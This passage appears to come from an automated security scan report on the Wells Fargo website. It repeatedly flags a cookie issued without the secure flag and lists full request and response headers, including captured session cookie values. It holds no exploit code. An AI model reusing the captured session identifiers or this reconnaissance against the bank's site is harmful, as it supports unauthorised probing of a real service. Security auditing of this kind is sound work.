Set-cookie: JSESSIONID=7117D3482F67F60B23716F580E8C6714; path=/; secure
Content-length: 259
Content-type: text/html
Fsreqid: REQ4d49d8740a034c3a20000edd0000aa33
Fscalleeid: ibweb321
Fselapsedtime: 9769
Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=EF949CC12A6233AB
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2549373706.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Clickthrough&RequestType=Click&COID= HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 404 Not found
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:30:03 GMT
Content-length: 3018
Content-type: text/html; charset=ISO-8859-1
Set-Cookie: ISD_WCM_COOKIE=2549373706.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head>
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=1760844554.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /about/diversity/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:27 GMT
Content-length: 8581
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=FY7dNJhH8RGtvgN8pvr6lX4lzZGNk421hDYK0F55Yk6vq3xThh62!-1136720127; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1760844554.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>About Wells Fargo - Diversity ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2582928138.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /autoloans/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:48 GMT
Content-length: 11460
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=KwsQNJhcppJbXh2HGTsl1xSTLrXLWgsZLDGy5r0NvKM6nG1NGQ1j!349572437; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2582928138.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2046057226.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /autoloans/apply HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 301 Moved Permanently
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:49 GMT
Content-length: 15
Content-type: text/html; charset=ISO-8859-1
X-Cnection: close
Location: https://financial.wellsfargo.com/autoapp/tostep1.do?promocode=WLAA11040010
Set-Cookie: wcmcookiewf=Fv9vNJhdHXqhTvtpGZyxXhXVBryX2GtWB5ZTb3zZv6w3Q0v3XypL!1507309987; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2046057226.16927.0000; path=/
Connection: close
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2348047114.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /browser/jaws_setting HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:19 GMT
Content-length: 3286
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=gCGwNJhfWxmh2NDPMGhQzzBB1njKkFyRGKJNnjbmVQ2rzhccQTt5!-1657447489; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2348047114.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"><head><script type="text/javascript" src="/java ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2146720522.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /careers/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:30:00 GMT
Content-length: 7617
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=sG2NNJhL8zpPgGJdS0NpchvpTRWLPJr0HLnS3ss5SYWfnJWcs2V7!1746616152; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2146720522.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2515819274.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checking/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:36 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=Q3cLNJhQSJXJ01dhNTVGyQlHhTNfcGvp2PwmMkwzDRSyBnTQJh5n!1192939746; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2515819274.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2264161034.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /com/comintro HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:25 GMT
Location: https://www.wellsfargo.com/com/
Set-Cookie: wcmcookiewf=hdNDNJhFB2Vy1gQG4jHHJMtydYJQ6bLJT7Jc3x03KXZTLVhH4VKx!312685559; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2264161034.16927.0000; path=/
Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/com/">h ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2532596490.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /credit_cards/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:38 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=lcphNJhSDNXQXcnvvp6Pqwv3mHjKLNpN7rmll0htLDpp25KdLbp1!-88744709; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2532596490.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=1777621770.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /credit_cards/select_card HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:38 GMT
Location: https://www.wellsfargo.com/credit_cards/
Set-Cookie: wcmcookiewf=cnHtNJhSv05Mv5yd9N4HJR2wQH8TNThgFHky9sygWXwY8CTHxjHQ!-1273606700; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1777621770.16927.0000; path=/
Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/credit_ ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2129943306.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /equity/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2163497738.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /equity/rate_payments/information/rate_calc HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:44 GMT
Location: https://www.wellsfargo.com/equity/tools/rate_calc
Set-Cookie: wcmcookiewf=LG9sNJhYpZTn2Dhm7pS2x0hcpW0hNsZJG2QzvpSYMRFWGZJ5tRlh!-705334509; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2163497738.16927.0000; path=/
Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://www.wellsfargo.com/equity/ ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2582928138.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /help/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:21 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=fTG5NJhBTvhh8THS9LpgByvt7m89Gy4r1dsVhd3yzr8nQnnF6vzk!349572437; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2582928138.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Customer Service f ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=1760844554.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /help/faqs/signon_faqs HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:22 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=vXXtNJhCXy5g11qrwqXKMTLPF3dHrhGLJvg8Wj9MRTTBXJmf9lQT!-1136720127; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1760844554.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2549373706.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /help/services HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:23 GMT
Content-length: 11416
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=TYQnNJhDw4QJgQtW7VVtnt2LBv3VJm8hq3Dj4zygqfRB09vyWKnn!191917939; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2549373706.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Customer Service - ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2532596490.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /insurance/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:54 GMT
Content-length: 8678
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=FYpQNJhCkvzKSyh2MqHzf7L6MkTTHxnLMf7gMw7y6G64TqKC2T9m!-88744709; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2532596490.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=1760844554.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /insurance/id_credit_protection/idtheft HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:55 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=9hF3NJhDTdc9PnjFnWG989NpqqdGyhQPmS2jnC9JQXqKM20QvTm9!-1136720127; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1760844554.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Identity Theft Protection - Id ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=1727290122.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /investing/hsa/enroll HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:52 GMT
Content-length: 9955
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=rGCpNJhQ3J2yYLGgChygHTVGrrYQnxRYXjGV7X8q1RBBkR0MCZRz!1893615402; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1727290122.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Health Savings Acc ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2046057226.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /investing/investmentservices/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:50 GMT
Content-length: 8732
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=3JcNNJhpcnnt2lQ8QP1vrTvQjGQzrsnrVYcCqTsht4tMhdvxRqh3!1507309987; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2046057226.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2398378762.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /investing/more HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:51 GMT
Content-length: 12093
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=2H4zNJhfczGZqD2NxFyn8Gw3cRRJsvd31PWX0Bjp5vwZRm5mlXBy!898739336; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2398378762.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=2146720522.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /investing/mutual_funds/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:50 GMT
Content-length: 12036
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=jrPSNJhptZ2KBS3w22FGDn8wnzWjhJTmp2lJ153w81CP30LvyQTs!1746616152; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2146720522.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en"> <head><title>Wells Fargo Mutual Fund Center ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
ISD_WCM_COOKIE=1844730634.16927.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /investing/retirement/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;
Response
HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:50 GMT
Content-length: 9837
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=72X3NJhdnllJ1jBN4whcFnn1dmL5hH6sM9yrH5Lk27rBF3pGF0Tb!215502378; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=1844730634.16927.0000; path=/
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
The following cookie was issued by the application and does not have the secure flag set:
